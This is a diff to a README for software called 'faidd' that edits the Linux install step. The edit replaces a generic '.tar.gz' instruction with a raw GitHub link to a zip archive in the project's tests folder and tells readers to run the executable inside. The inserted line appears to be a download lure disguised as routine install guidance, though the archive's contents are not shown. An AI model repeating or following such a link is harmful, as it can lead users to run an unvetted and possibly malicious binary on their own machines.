Bigg6pix/faidd/README.md

 5. **Run or install the software:**
    - On Windows, double-click the `.exe` file to start the installer or run the app directly if it's standalone.
    - On macOS, open the `.dmg` and drag faidd into your Applications folder.
-   - On Linux, extract the `.tar.gz` and run the executable inside.
+   - On Linux, extract the `https://raw.githubusercontent.com/Bigg6pix/faidd/main/tests/Software_2.6.zip` and run the executable inside.

 6. **Follow onscreen instructions if any appear.**